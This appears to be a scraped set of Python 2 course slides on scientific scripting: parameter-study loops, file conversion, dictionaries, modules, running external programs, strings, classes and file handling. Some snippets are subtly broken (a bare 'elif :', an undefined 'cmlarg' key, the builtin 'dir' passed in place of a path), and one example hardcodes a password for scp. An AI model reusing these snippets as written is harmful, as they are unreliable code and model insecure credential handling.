case = 'tmp_m_%g' % m
...
psfiles.append(os.path.join(case,case+'.ps'))
...
...
s = 'epsmerge -o tmp_mruns.ps -x 2 -y 3 -par ' + \
' '.join(psfiles)
failure, output = commands.getstatusoutput(s)

![]() | When we vary m, wouldn't it be nice to see progressive plots put together in a movie? |
![]() | Can combine the PNG files together in an animated GIF file:
convert -delay 50 -loop 1000 -crop 0x0 \
plot1.png plot2.png plot3.png plot4.png ... movie.gif
animate movie.gif # or display movie.gif
(convert and animate are ImageMagick tools)
|
![]() | Collect all PNG filenames in a list and join the list items (as in the generation of the ps-file report) |

![]() | Enable loops over an arbitrary parameter (not only m)
# easy:
'-m %g' % m
# is replaced with
'-%s %s' % (str(prm_name), str(prm_value))
# prm_value plays the role of the m variable
# prm_name ('m', 'b', 'c', ...) is read as input
|
![]() | Keep the range of the y axis fixed (for movie) |
![]() | Files:
simviz1.py : run simulation and visualization
simviz2.py : additional option for yaxis scale
loop4simviz1.py : m loop calling simviz1.py
loop4simviz2.py : loop over any parameter in
simviz2.py and make movie
|

![]() | Study the impact of increasing the mass:
./loop4simviz2.py m 0.1 6.1 0.5 -yaxis -0.5 0.5 -noscreenplot |
![]() | Study the impact of a nonlinear spring:
./loop4simviz2.py c 5 30 2 -yaxis -0.7 0.7 -b 0.5 \
-func siny -noscreenplot
|
![]() | Study the impact of increasing the damping:
./loop4simviz2.py b 0 2 0.25 -yaxis -0.5 0.5 -A 4(loop over b, from 0 to 2 in steps of 0.25) |

![]() | Reports:
tmp_c.gif # animated GIF (movie) animate tmp_c.gif tmp_c_runs.html # browsable HTML document tmp_c_runs.ps # all plots in a ps-file |
![]() | All experiments are archived in a directory with a filename reflecting the varying parameter:
tmp_m_2.1 tmp_b_0 tmp_c_29 |
![]() | All generated files/directories start with tmp so it is easy to clean up hundreds of experiments |
![]() | Try the listed loop4simviz2.py commands!! |

![]() | Make a summary report with the equation, a picture of the system, the command-line arguments, and a movie of the solution |
![]() | Make a link to a detailed report with plots of all the individual experiments |
![]() | Demo:
./loop4simviz2_2html.py m 0.1 6.1 0.5 -yaxis -0.5 0.5 -noscreenplot ls -d tmp_* mozilla tmp_m_summary.html |

![]() | Archiving of experiments and having a system for uniquely relating input data to visualizations or result files are fundamental for reliable scientific investigations |
![]() | The experiments can easily be reproduced |
![]() | New (large) sets of experiments can be generated |
![]() | We make tailored tools for investigating results |
![]() | All these items contribute to increased quality of numerical experimentation |

![]() | Input file with time series data:
some comment line
1.5
measurements model1 model2
0.0 0.1 1.0
0.1 0.1 0.188
0.2 0.2 0.25
Contents: comment line, time step, headings, time series data
|
![]() | Goal: split file into two-column files, one for each time series |
![]() | Script: interpret input file, split text, extract data and write files |

![]() | The model1.dat file, arising from column no 2,
becomes
0 0.1 1.5 0.1 3 0.2 |
![]() | The time step parameter, here 1.5, is used to generate the first column |

![]() | Read inputfile name (1st command-line arg.) | ||||
![]() | Open input file | ||||
![]() | Read and skip the 1st (comment) line | ||||
![]() | Extract time step from the 2nd line | ||||
![]() | Read time series names from the 3rd line | ||||
![]() | Make a list of file objects, one for each time series | ||||
![]() | Read the rest of the file, line by line:
|

![]() | Reading and writing files |
![]() | Sublists |
![]() | List of file objects |
![]() | Dictionaries |
![]() | Arrays of numbers |
![]() | List comprehension |
![]() | Refactoring a flat script as functions in a module |

![]() | Open file and read comment line:
infilename = sys.argv[1] ifile = open(infilename, 'r') # open for reading line = ifile.readline() |
![]() | Read time step from the next line:
dt = float(ifile.readline()) |
![]() | Read next line containing the curvenames:
ynames = ifile.readline().split() |

![]() |
Make a list of file objects for output of each time series:
outfiles = []
for name in ynames:
outfiles.append(open(name + '.dat', 'w'))
|

![]() |
Read each line, split into y values, write to output files:
t = 0.0 # t value
# read the rest of the file line by line:
while 1:
line = ifile.readline()
if not line: break
yvalues = line.split()
# skip blank lines:
if len(yvalues) == 0: continue
for i in range(len(outfiles)):
outfiles[i].write('%12g %12.5e\n' % \
(t, float(yvalues[i])))
t += dt
for file in outfiles:
file.close()
|

![]() | Dictionary = array with a text as index |
![]() | Also called hash or associative array in other languages |
![]() | Can store 'anything':
prm['damping'] = 0.2 # number
def x3(x):
return x*x*x
prm['stiffness'] = x3 # function object
prm['model1'] = [1.2, 1.5, 0.1] # list object
|
![]() | The text index is called key |

![]() |
Could store the time series in memory as a dictionary of lists; the list items are the y values and the y names are the keys
y = {} # declare empty dictionary
# ynames: names of y curves
for name in ynames:
y[name] = [] # for each key, make empty list
lines = ifile.readlines() # list of all lines
...
for line in lines[3:]:
yvalues = [float(x) for x in line.split()]
i = 0 # counter for yvalues
for name in ynames:
y[name].append(yvalues[i]); i += 1
|

![]() | Specifying a sublist, e.g., the 4th line until the last line: lines[3:]
Transforming all words in a line to floats:
yvalues = [float(x) for x in line.split()]
# same as
numbers = line.split()
yvalues = []
for s in numbers:
yvalues.append(float(s))
|

![]() | The input file
some comment line
1.5
measurements model1 model2
0.0 0.1 1.0
0.1 0.1 0.188
0.2 0.2 0.25
results in the following y dictionary:
'measurements': [0.0, 0.1, 0.2], 'model1': [0.1, 0.1, 0.2], 'model2': [1.0, 0.188, 0.25](this output is plain print: print y) |

![]() | Fortran/C programmers tend to think of indices as integers |
![]() | Scripters make heavy use of dictionaries and text-type indices (keys) |
![]() | Python dictionaries can use (almost) any object as key (!) |
![]() | A dictionary is also often called hash (e.g. in Perl) or associative array |
![]() | Examples will demonstrate their use |

![]() | The previous script is ``flat'' (start at top, run to bottom) | ||||||
![]() | Parts of it may be reusable | ||||||
![]() | We may like to load data from file, operate on data, and then dump data | ||||||
![]() | Let's refactor the script:
|

def load_data(filename):
f = open(filename, 'r'); lines = f.readlines(); f.close()
dt = float(lines[1])
ynames = lines[2].split()
y = {}
for name in ynames: # make y a dictionary of (empty) lists
y[name] = []
for line in lines[3:]:
yvalues = [float(yi) for yi in line.split()]
if len(yvalues) == 0: continue # skip blank lines
for name, value in zip(ynames, yvalues):
y[name].append(value)
return y, dt

![]() | Note: the function returns two (!) values; a dictionary of lists, plus a float |
![]() | It is common that output data from a Python function are returned, and multiple data structures can be returned (actually packed as a tuple, a kind of ``constant list'') |
![]() | Here is how the function is called:
y, dt = load_data('somedatafile.dat')
print y
Output from print y:
>>> y
{'tmp-model2': [1.0, 0.188, 0.25],
'tmp-model1': [0.10000000000000001, 0.10000000000000001,
0.20000000000000001],
'tmp-measurements': [0.0, 0.10000000000000001, 0.20000000000000001]}
|

![]() | C/C++/Java/Fortran-like iteration over two arrays/lists:
for i in range(len(list)):
e1 = list1[i]; e2 = list2[i]
# work with e1 and e2
|
![]() | Pythonic version:
for e1, e2 in zip(list1, list2):
# work with element e1 from list1 and e2 from list2
For example,
for name, value in zip(ynames, yvalues):
y[name].append(value)
|

def dump_data(y, dt):
# write out 2-column files with t and y[name] for each name:
for name in y.keys():
ofile = open(name+'.dat', 'w')
for k in range(len(y[name])):
ofile.write('%12g %12.5e\n' % (k*dt, y[name][k]))
ofile.close()

![]() | Our goal is to reuse load_data and dump_data, possibly with some operations on y in between:
from convert3 import load_data, dump_data
y, timestep = load_data('.convert_infile1')
from math import fabs
for name in y: # run through keys in y
maxabsy = max([fabs(yval) for yval in y[name]])
print 'max abs(y[%s](t)) = %g' % (name, maxabsy)
dump_data(y, timestep)
|
![]() | Then we need to make a module convert3! |

![]() | Collect the functions in the module in a file, here the file is called convert3.py |
![]() | We have then made a module convert3 |
![]() | The usage is as exemplified on the previous slide |

![]() | The scripts convert1.py and convert2.py load and dump data - this functionality can be reproduced by an application script using convert3 |
![]() | The application script can be included in the module:
if __name__ == '__main__':
import sys
try:
infilename = sys.argv[1]
except:
usage = 'Usage: %s infile' % sys.argv[0]
print usage; sys.exit(1)
y, dt = load_data(infilename)
dump_data(y, dt)
|
![]() | If the module file is run as a script, the if test is true and the application script is run |
![]() | If the module is imported in a script, the if test is false and no statements are executed |

![]() | As script:
unix> ./convert3.py someinputfile.dat |
![]() | As module:
import convert3
y, dt = convert3.load_data('someinputfile.dat')
# do more with y?
dump_data(y, dt)
|
![]() | The application script at the end also serves as an example on how to use the module |

![]() | Construct an example on the functionality of the script, if that is not included in the problem description |
![]() | Write very high-level pseudo code with words |
![]() | Scan known examples for constructions and functionality that can come into use |
![]() | Look up man pages, reference manuals, FAQs, or textbooks for functionality you have minor familiarity with, or to clarify syntax details |
![]() | Search the Internet if the documentation from the latter point does not provide sufficient answers |

![]() | Exercise: Write a function myjoin that concatenates a list of strings to a single string, with a specified delimiter between the list elements. That is, myjoin is supposed to be an implementation of a string's join method in terms of basic string operations. |
![]() | Functionality:
s = myjoin(['s1', 's2', 's3'], '*') # s becomes 's1*s2*s3' |

![]() | Pseudo code:
function myjoin(list, delimiter)
joined = first element in list
for element in rest of list:
concatenate joined, delimiter and element
return joined
|
![]() | Known examples: string concatenation (+ operator) from hw.py, list indexing (list[0]) from datatrans1.py, sublist extraction (list[1:]) from convert1.py, function construction from datatrans1.py |

def myjoin(list, delimiter):
joined = list[0]
for element in list[1:]:
joined += delimiter + element
return joined
That's it!

![]() | Use comments to explain ideas |
![]() | Use descriptive variable names to reduce the need for more comments |
![]() | Find generic solutions (unless the code size explodes) |
![]() | Strive at compact code, but not too compact |
![]() | Invoke the Python interpreter and run import this |
![]() | Always construct a demonstrating running example and include in it
the source code file inside triple-quoted strings:
""" unix> python hw.py 3.1459 Hello, World! sin(3.1459)=-0.00430733309102 """ |

![]() | Here is a suitable command for printing exercises for a week:
unix> a2ps --line-numbers=1 -4 -o outputfile.ps *.pyThis prints all *.py files, with 4 (because of -4) pages per sheet |
![]() | See man a2ps for more info about this command |
![]() | In every exercise you also need examples on how a script is run and what the output is -- one recommendation is to put all this info (cut from the terminal window and pasted in your editor) in a triple double quoted Python string (such a string can be viewed as example/documentation/comment as it does not affect the behavior of the script) |


![]() | running an application |
![]() | file reading and writing |
![]() | list and dictionary operations |
![]() | splitting and joining text |
![]() | basics of Python classes |
![]() | writing functions |
![]() | file globbing, testing file types |
![]() | copying and renaming files, creating and moving to directories, creating directory paths, removing files and directories |
![]() | directory tree traversal |
![]() | parsing command-line arguments |

![]() | pydoc somemodule.somefunc, pydoc somemodule |
![]() | doc.html! Links to lots of electronic information |
![]() | The Python Library Reference (go to the index) |
![]() | Python in a Nutshell |
![]() | Beazley's Python reference book |
![]() | Your favorite Python language book |
![]() |

![]() | We requently illustrate Python constructions in the interactive shell |
![]() | Recommended shells: IDLE or IPython |
![]() | Examples (using standard prompt, not default IPython look):
>>> t = 0.1
>>> def f(x):
... return math.sin(x)
...
>>> f(t)
0.099833416646828155
>>> os.path.splitext('/some/long/path/myfile.dat')
('/some/long/path/myfile', '.dat')
|
![]() | Help in the shell:
>>> help(os.path.splitext) |

| C and C++ programmers heavily utilize the ``C preprocessor'' for including files, excluding code blocks, defining constants, etc. | |
| preprocess is a (Python!) program that provides (most) ``C preprocessor'' functionality for Python, Perl, Ruby, shell scripts, makefiles, HTML, Java, JavaScript, PHP, Fortran, C, C++, ... (!) | |
| preprocess directives are typeset within comments | |
| Most important directives: include, if/ifdef/ifndef/else/endif, define | |
See pydoc preprocess for documentation
# #if defined('DEBUG') and DEBUG >= 2
# write out debug info at level 2:
...
# #elif DEBUG == 0
# write out minimal debug info:
...
# #else
# no debug output
# #endif
preprocess -DDEBUG=1 pyscript.p.py > pyscript.py
| |
| preprocess cannot do macros with arguments |

Include documentation or common code snippets in several files
# #include "myfile.py" | |
Exclude/include code snippets according to an variable (its value or
just if the variable is defined)
# #ifdef MyDEBUG ....debug code.... # #endif | |
Define variables with optional value
# #define MyDEBUG # #define MyDEBUG 2Such preprocessor variables can also be defined on the command line preprocess -DMyDEBUG=2 myscript.p.py > myscript.py | |
| Naming convention: .p.py files are input |

![]() | Run a stand-alone program:
cmd = 'myprog -c file.1 -p -f -q > res' failure = os.system(cmd) if failure: print '%s: running myprog failed' % sys.argv[0] sys.exit(1) |
![]() | Redirect output from the application to a list of lines:
pipe = os.popen(cmd) output = pipe.readlines() pipe.close() for line in output: # process line |
| Better tool: the commands module (next slide) |

![]() | Best way to execute another program:
import commands
failure, output = commands.getstatusoutput(cmd)
if failure:
print 'Could not run', cmd; sys.exit(1)
for line in output.splitlines() # or output.split('\n'):
# process line
(output holds the output as a string)
|
![]() | output holds both standard error and standard output (os.popen grabs only standard output so you do not see error messages) |

![]() | os.system, pipes, or commands.getstatusoutput terminates after the command has terminated | ||||
![]() | There are two methods for running the script in parallel with the command:
| ||||
![]() | More info: see ``Platform-dependent operations'' slide and the threading module |

![]() | Open (in a script) a dialog with an interactive program:
gnuplot = os.popen('gnuplot -persist', 'w')
gnuplot.write("""
set xrange [0:10]; set yrange [-2:2]
plot sin(x)
quit
""")
gnuplot.close() # gnuplot is now run with the written input
|
![]() | Same as "here documents" in Unix shells:
gnuplot <<EOF set xrange [0:10]; set yrange [-2:2] plot sin(x) quit EOF |

![]() | There are popen modules that allows us to have two-way comminucation with an application (read/write), but this technique is not suitable for reliable two-way dialog (easy to get hang-ups) |
![]() | The pexpect module is the right tool for a two-way dialog with a stand-alone application
# copy files to remote host via scp and password dialog
cmd = 'scp %s %s@%s:%s' % (filename, user, host, directory)
import pexpect
child = pexpect.spawn(cmd)
child.expect('password:')
child.sendline('&%$hQxz?+MbH')
child.expect(pexpect.EOF) # important; wait for end of scp session
child.close()
|
Complete example: simviz1.py version that runs oscillator
on a remote machine (``supercomputer'') via pexpect:
src/py/examples/simviz/simviz1_ssh_pexpect.py |

![]() | Load a file into list of lines:
infilename = '.myprog.cpp' infile = open(infilename, 'r') # open file for reading # load file into a list of lines: lines = infile.readlines() # load file into a string: filestr = infile.read() |
![]() | Line-by-line reading (for large files):
while 1:
line = infile.readline()
if not line: break
# process line
|

![]() | Open a new output file:
outfilename = '.myprog2.cpp'
outfile = open(outfilename, 'w')
outfile.write('some string\n')
|
![]() | Append to existing file:
outfile = open(outfilename, 'a')
outfile.write('....')
|

| Numbers: float, complex, int (+ bool) | |
| Sequences: list, tuple, str, NumPy arrays | |
| Mappings: dict (dictionary/hash) | |
| Instances: user-defined class | |
| Callables: functions, callable instances |

![]() |
Python distinguishes between strings and numbers:
b = 1.2 # b is a number b = '1.2' # b is a string a = 0.5 * b # illegal: b is NOT converted to float a = 0.5 * float(b) # this works |
![]() | All Python objects are compard with
== != < > <= >= |

![]() | Consider:
b = '1.2' if b < 100: print b, '< 100' else: print b, '>= 100'What do we test? string less than number! |
![]() | What we want is
if float(b) < 100: # floating-point number comparison # or if b < str(100): # string comparison |

| bool is True or False | |
| Can mix bool with int 0 (false) or 1 (true) | |
Boolean tests:
a = ''; a = []; a = (); a = {}; # empty structures
a = 0; a = 0.0
if a: # false
if not a: # true
other values of a: if a is true
|

![]() | Initializing a list:
arglist = [myarg1, 'displacement', "tmp.ps"] |
![]() | Or with indices (if there are already two list elements):
arglist[0] = myarg1 arglist[1] = 'displacement' |
![]() | Create list of specified length:
n = 100 mylist = [0.0]*n |
![]() | Adding list elements:
arglist = [] # start with empty list
arglist.append(myarg1)
arglist.append('displacement')
|

![]() | Extract elements form a list:
filename, plottitle, psfile = arglist (filename, plottitle, psfile) = arglist [filename, plottitle, psfile] = arglist |
![]() | Or with indices:
filename = arglist[0] plottitle = arglist[1] |

![]() | For each item in a list:
for entry in arglist:
print 'entry is', entry
|
![]() | For-loop-like traversal:
start = 0; stop = len(arglist); step = 1
for index in range(start, stop, step):
print 'arglist[%d]=%s' % (index,arglist[index])
|
![]() | Visiting items in reverse order:
mylist.reverse() # reverse order
for item in mylist:
# do something...
|

Compact syntax for manipulating all elements of a list:
y = [ float(yi) for yi in line.split() ] # call function float x = [ a+i*h for i in range(n+1) ] # execute expression(called list comprehension) | |
Written out:
y = []
for yi in line.split():
y.append(float(yi))
etc.
|

map is an alternative to list comprehension:
y = map(float, line.split()) y = map(lambda i: a+i*h, range(n+1)) | |
| map is faster than list comprehension but not as easy to read |

d = [] # declare empty list
d.append(1.2) # add a number 1.2
d.append('a') # add a text
d[0] = 1.3 # change an item
del d[1] # delete an item
len(d) # length of list

![]() | Lists can be nested and heterogeneous |
![]() |
List of string, number, list and dictionary:
>>> mylist = ['t2.ps', 1.45, ['t2.gif', 't2.png'],\
{ 'factor' : 1.0, 'c' : 0.9} ]
>>> mylist[3]
{'c': 0.90000000000000002, 'factor': 1.0}
>>> mylist[3]['factor']
1.0
>>> print mylist
['t2.ps', 1.45, ['t2.gif', 't2.png'],
{'c': 0.90000000000000002, 'factor': 1.0}]
|
![]() | Note: print prints all basic Python data structures in a nice format |

![]() | In-place sort:
mylist.sort()modifies mylist! >>> print mylist [1.4, 8.2, 77, 10] >>> mylist.sort() >>> print mylist [1.4, 8.2, 10, 77] |
![]() | Strings and numbers are sorted as expected |

# ignore case when sorting:
def ignorecase_sort(s1, s2):
s1 = s1.lower()
s2 = s2.lower()
if s1 < s2: return -1
elif s1 == s2: return 0
else: return 1
# or a quicker variant, using Python's built-in
# cmp function:
def ignorecase_sort(s1, s2):
s1 = s1.lower(); s2 = s2.lower()
return cmp(s1,s2)
# usage:
mywords.sort(ignorecase_sort)

![]() |
Tuple = constant list; items cannot be modified
>>> s1=[1.2, 1.3, 1.4] # list
>>> s2=(1.2, 1.3, 1.4) # tuple
>>> s2=1.2, 1.3, 1.4 # may skip parenthesis
>>> s1[1]=0 # ok
>>> s2[1]=0 # illegal
Traceback (innermost last):
File "<pyshell#17>", line 1, in ?
s2[1]=0
TypeError: object doesn't support item assignment
>>> s2.sort()
AttributeError: 'tuple' object has no attribute 'sort'
|
![]() | You cannot append to tuples, but you can add two tuples to form a new tuple |

![]() | Dictionary = array with text indices (keys) (even user-defined objects can be indices!) |
![]() | Also called hash or associative array |
![]() | Common operations:
d['mass'] # extract item corresp. to key 'mass'
d.keys() # return copy of list of keys
d.get('mass',1.0) # return 1.0 if 'mass' is not a key
d.has_key('mass') # does d have a key 'mass'?
d.items() # return list of (key,value) tuples
del d['mass'] # delete an item
len(d) # the number of items
|

![]() | Multiple items:
d = { 'key1' : value1, 'key2' : value2 }
|
![]() | Item by item (indexing):
d['key1'] = anothervalue1 d['key2'] = anothervalue2 d['key3'] = value2 |

![]() | Problem: store MPEG filenames corresponding to a parameter with values 1, 0.1, 0.001, 0.00001
movies[1] = 'heatsim1.mpeg' movies[0.1] = 'heatsim2.mpeg' movies[0.001] = 'heatsim5.mpeg' movies[0.00001] = 'heatsim8.mpeg' |
![]() | Store compiler data:
g77 = {
'name' : 'g77',
'description' : 'GNU f77 compiler, v2.95.4',
'compile_flags' : ' -pg',
'link_flags' : ' -pg',
'libs' : '-lf2c',
'opt' : '-O3 -ffast-math -funroll-loops'
}
|

![]() | Idea: hold command-line arguments in a dictionary cmlargs[option], e.g., cmlargs['infile'], instead of separate variables |
![]() | Initialization: loop through sys.argv, assume options in pairs: --option value
arg_counter = 1
while arg_counter < len(sys.argv):
option = sys.argv[arg_counter]
option = option[2:] # remove double hyphen
if option in cmlargs:
# next command-line argument is the value:
arg_counter += 1
value = sys.argv[arg_counter]
cmlargs[cmlarg] = value
else:
# illegal option
arg_counter += 1
|

![]() | Working with cmlargs in simviz1.py:
f = open(cmlargs['case'] + '.', 'w')
f.write(cmlargs['m'] + '\n')
f.write(cmlargs['b'] + '\n')
f.write(cmlargs['c'] + '\n')
f.write(cmlargs['func'] + '\n')
...
# make gnuplot script:
f = open(cmlargs['case'] + '.gnuplot', 'w')
f.write("""
set title '%s: m=%s b=%s c=%s f(y)=%s A=%s w=%s y0=%s dt=%s';
""" % (cmlargs['case'],cmlargs['m'],cmlargs['b'],
cmlargs['c'],cmlargs['func'],cmlargs['A'],
cmlargs['w'],cmlargs['y0'],cmlargs['dt']))
if not cmlargs['noscreenplot']:
f.write("plot 'sim.dat' title 'y(t)' with lines;\n")
|
![]() | Note: all cmlargs[opt] are (here) strings! |

![]() | The dictionary-like os.environ holds the environment variables:
os.environ['PATH'] os.environ['HOME'] os.environ['scripting'] |
![]() | Write all the environment variables in alphabethic order:
sorted_env = os.environ.keys()
sorted_env.sort()
for key in sorted_env:
print '%s = %s' % (key, os.environ[key])
|

![]() | Check if a given program is on the system:
program = 'vtk'
path = os.environ['PATH']
# PATH can be /usr/bin:/usr/local/bin:/usr/X11/bin
# os.pathsep is the separator in PATH
# (: on Unix, ; on Windows)
paths = path.split(os.pathsep)
for d in paths:
if os.path.isdir(d):
if os.path.isfile(os.path.join(d, program)):
program_path = d; break
try: # program was found if program_path is defined
print '%s found in %s' % (program, program_path)
except:
print '%s not found' % program
|

![]() | On Windows, programs usually end with .exe (binaries) or .bat (DOS scripts), while on Unix most programs have no extension |
![]() | We test if we are on Windows:
if sys.platform[:3] == 'win':
# Windows-specific actions
|
![]() | Cross-platform snippet for finding a program:
for d in paths:
if os.path.isdir(d):
fullpath = os.path.join(dir, program)
if sys.platform[:3] == 'win': # windows machine?
for ext in '.exe', '.bat': # add extensions
if os.path.isfile(fullpath + ext):
program_path = d; break
else:
if os.path.isfile(fullpath):
program_path = d; break
|

![]() | Split string into words:
>>> files = 'case1.ps case2.ps case3.ps' >>> files.split() ['case1.ps', 'case2.ps', 'case3.ps'] |
![]() | Can split wrt other characters:
>>> files = 'case1.ps, case2.ps, case3.ps'
>>> files.split(', ')
['case1.ps', 'case2.ps', 'case3.ps']
>>> files.split(', ') # extra erroneous space after comma...
['case1.ps, case2.ps, case3.ps'] # unsuccessful split
|
![]() | Very useful when interpreting files |

![]() | Suppose you have file containing numbers only |
![]() | The file can be formatted 'arbitrarily', e.g,
1.432 5E-09 1.0 3.2 5 69 -111 4 7 8 |
![]() | Get a list of all these numbers:
f = open(filename, 'r') numbers = f.read().split() |
![]() | String objects's split function splits wrt sequences of whitespace (whitespace = blank char, tab or newline) |

![]() | Convert the list of strings to a list of floating-point numbers, using map:
numbers = [ float(x) for x in f.read().split() ] |
![]() | Think about reading this file in Fortran or C! (quite some low-level code...) |
![]() | This is a good example of how scripting languages, like Python, yields flexible and compact code |

![]() |
Join is the opposite of split:
>>> line1 = 'iteration 12: eps= 1.245E-05' >>> line1.split() ['iteration', '12:', 'eps=', '1.245E-05'] >>> w = line1.split() >>> ' '.join(w) # join w elements with delimiter ' ' 'iteration 12: eps= 1.245E-05' |
![]() | Any delimiter text can be used:
>>> '@@@'.join(w) 'iteration@@@12:@@@eps=@@@1.245E-05' |

f = open('myfile', 'r')
lines = f.readlines() # list of lines
filestr = ''.join(lines) # a single string
# can instead just do
# filestr = file.read()
# do something with filestr, e.g., substitutions...
# convert back to list of lines:
lines = filestr.splitlines()
for line in lines:
# process line

![]() | Exact word match:
if line == 'double':
# line equals 'double'
if line.find('double') != -1:
# line contains 'double'
|
![]() | Matching with Unix shell-style wildcard
notation:
import fnmatch if fnmatch.fnmatch(line, 'double'): # line contains 'double'Here, double can be any valid wildcard expression, e.g., double* [Dd]ouble |

![]() | Matching with full regular expressions:
import re
if re.search(r'double', line):
# line contains 'double'
Here, double can be any valid regular expression, e.g.,
double[A-Za-z0-9_]* [Dd]ouble (DOUBLE|double) |

![]() | Simple substitution:
newstring = oldstring.replace(substring, newsubstring) |
![]() | Substitute regular expression
pattern by replacement in str:
import re str = re.sub(pattern, replacement, str) |

![]() |
There are many ways of constructing strings in Python:
s1 = 'with forward quotes'
s2 = "with double quotes"
s3 = 'with single quotes and a variable: %(r1)g' \
% vars()
s4 = """as a triple double (or single) quoted string"""
s5 = """triple double (or single) quoted strings
allow multi-line text (i.e., newline is preserved)
with other quotes like ' and "
"""
|
![]() |
Raw strings are widely used for regular expressions
s6 = r'raw strings start with r and \ remains backslash' s7 = r"""another raw string with a double backslash: \\ """ |

![]() | String concatenation:
myfile = filename + '_tmp' + '.dat' |
![]() | Substring extraction:
>>> teststr = '0123456789' >>> teststr[0:5]; teststr[:5] '01234' '01234' >>> teststr[3:8] '34567' >>> teststr[3:] '3456789' |

![]() | The items/contents of mutable objects can be changed in-place |
![]() | Lists and dictionaries are mutable |
![]() | The items/contents of immutable objects cannot be changed in-place |
![]() | Strings and tuples are immutable
>>> s2=(1.2, 1.3, 1.4) # tuple >>> s2[1]=0 # illegal |

![]() | Similar class concept as in Java and C++ |
![]() | All functions are virtual |
![]() | No private/protected variables (the effect can be "simulated") |
![]() | Single and multiple inheritance |
![]() | Everything in Python is a class and works with classes |
![]() | Class programming is easier and faster than in C++ and Java (?) |

![]() | Declare a base class MyBase:
class MyBase:
def __init__(self,i,j): # constructor
self.i = i; self.j = j
def write(self): # member function
print 'MyBase: i=',self.i,'j=',self.j
|
![]() | self is a reference to this object |
![]() | Data members are prefixed by self: self.i, self.j |
![]() | All functions take self as first argument in the declaration, but not in the call
obj1 = MyBase(6,9); obj1.write() |

![]() | Class MySub is a subclass of MyBase:
class MySub(MyBase):
def __init__(self,i,j,k): # constructor
MyBase.__init__(self,i,j)
self.k = k;
def write(self):
print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
|
![]() | Example:
# this function works with any object that has a write func: def write(v): v.write() # make a MySub instance i = MySub(7,8,9) write(i) # will call MySub's write |

![]() | Python functions have the form
def function_name(arg1, arg2, arg3):
# statements
return something
|
![]() | Example:
def debug(comment, variable):
if os.environ.get('PYDEBUG', '0') == '1':
print comment, variable
...
v1 = file.readlines()[3:]
debug('file %s (exclusive header):' % file.name, v1)
v2 = somefunc()
debug('result of calling somefunc:', v2)
This function prints any printable object!
|

![]() | Can name arguments, i.e., keyword=default-value
def mkdir(dirname, mode=0777, remove=1, chdir=1):
if os.path.isdir(dirname):
if remove: shutil.rmtree(dirname)
elif : return 0 # did not make a new directory
os.mkdir(dir, mode)
if chdir: os.chdir(dirname)
return 1 # made a new directory
Calls look like
mkdir('tmp1')
mkdir('tmp1', remove=0, mode=0755)
mkdir('tmp1', 0755, 0, 1) # less readable
|
![]() | Keyword arguments make the usage simpler and improve documentation |

![]() | Variable number of ordinary arguments:
def somefunc(a, b, *rest):
for arg in rest:
# treat the rest...
# call:
somefunc(1.2, 9, 'one text', 'another text')
# ...........rest...........
|
![]() | Variable number of keyword arguments:
def somefunc(a, b, *rest, **kw):
#...
for arg in rest:
# work with arg...
for key in kw.keys():
# work kw[key]
|

![]() |
A function computing the average and the max and min value of a series of numbers:
def statistics(*args):
avg = 0; n = 0; # local variables
for number in args: # sum up all the numbers
n = n + 1; avg = avg + number
avg = avg / float(n) # float() to ensure non-integer division
min = args[0]; max = args[0]
for term in args:
if term < min: min = term
if term > max: max = term
return avg, min, max # return tuple
|
![]() | Usage:
average, vmin, vmax = statistics(v1, v2, v3, b) |

![]() | The statistics function can be written more compactly using (advanced) Python functionality:
def statistics(*args):
return (reduce(operator.add, args)/float(len(args)),
min(args), max(args))
|
![]() | reduce(op,a): apply operation op successively on all elements in list a (here all elements are added) |
![]() | min(a), max(a): find min/max of a list a |

![]() | Python scripts normally avoid call by reference and return all output variables instead |
![]() | Try to swap two numbers:
>>> def swap(a, b):
tmp = b; b = a; a = tmp;
>>> a=1.2; b=1.3; swap(a, b)
>>> print a, b # has a and b been swapped?
(1.2, 1.3) # no...
|
![]() |
The way to do this particular task
>>> def swap(a, b):
return (b,a) # return tuple
# or smarter, just say (b,a) = (a,b) or simply b,a = a,b
|

![]() | Lists can be changed in-place in functions:
>>> def somefunc(mutable, item, item_value): mutable[item] = item_value >>> a = ['a','b','c'] # a list >>> somefunc(a, 1, 'surprise') >>> print a ['a', 'surprise', 'c'] |
![]() | This works for dictionaries as well (but not tuples) and instances of user-defined classes |

The Python programming style is to have input data as arguments and output data as return values
def myfunc(i1, i2, i3, i4=False, io1=0):
# io1: input and output variable
...
# pack all output variables in a tuple:
return io1, o1, o2, o3
# usage:
a, b, c, d = myfunc(e, f, g, h, a)
| |
| Only (a kind of) references to objects are transferred so returning a large data structure implies just returning a reference |

![]() | Variables defined inside the function are local |
![]() | To change global variables, these must be declared as global inside the function
s = 1
def myfunc(x, y):
z = 0 # local variable, dies when we leave the func.
global s
s = 2 # assignment requires decl. as global
return y-1,z+1
|
![]() | Variables can be global, local (in func.), and class attributes |
![]() | The scope of variables in nested functions may confuse newcomers (see ch. 8.7 in the course book) |

![]() | List all .ps and .gif files (Unix):
ls *.ps *.gif |
![]() | Cross-platform way to do it in Python:
import glob
filelist = glob.glob('*.ps') + glob.glob('*.gif')
This is referred to as file globbing
|

import os.path
print myfile,
if os.path.isfile(myfile):
print 'is a plain file'
if os.path.isdir(myfile):
print 'is a directory'
if os.path.islink(myfile):
print 'is a link'
# the size and age:
size = os.path.getsize(myfile)
time_of_last_access = os.path.getatime(myfile)
time_of_last_modification = os.path.getmtime(myfile)
# times are measured in seconds since 1970.01.01
days_since_last_access = \
(time.time() - os.path.getatime(myfile))/(3600*24)

import stat
myfile_stat = os.stat(myfile)
filesize = myfile_stat[stat.ST_SIZE]
mode = myfile_stat[stat.ST_MODE]
if stat.S_ISREG(mode):
print '%(myfile)s is a regular file '\
'with %(filesize)d bytes' % vars()
Check out the stat module in Python Library
Reference

![]() | Copy a file:
import shutil shutil.copy(myfile, tmpfile) |
![]() | Rename a file:
os.rename(myfile, 'tmp.1') |
![]() | Remove a file:
os.remove('mydata')
# or os.unlink('mydata')
|

![]() |
Cross-platform construction of file paths:
filename = os.path.join(os.pardir, 'src', 'lib') # Unix: ../src/lib # Windows: ..\src\lib shutil.copy(filename, os.curdir) # Unix: cp ../src/lib . # os.pardir : .. # os.curdir : . |

![]() | Creating and moving to directories:
dirname = 'mynewdir'
if not os.path.isdir(dirname):
os.mkdir(dirname) # or os.mkdir(dirname,'0755')
os.chdir(dirname)
|
![]() | Make complete directory path with intermediate directories:
path = os.path.join(os.environ['HOME'],'py','src') os.makedirs(path) # Unix: mkdirhier $HOME/py/src |
![]() | Remove a non-empty directory tree:
shutil.rmtree('myroot')
|

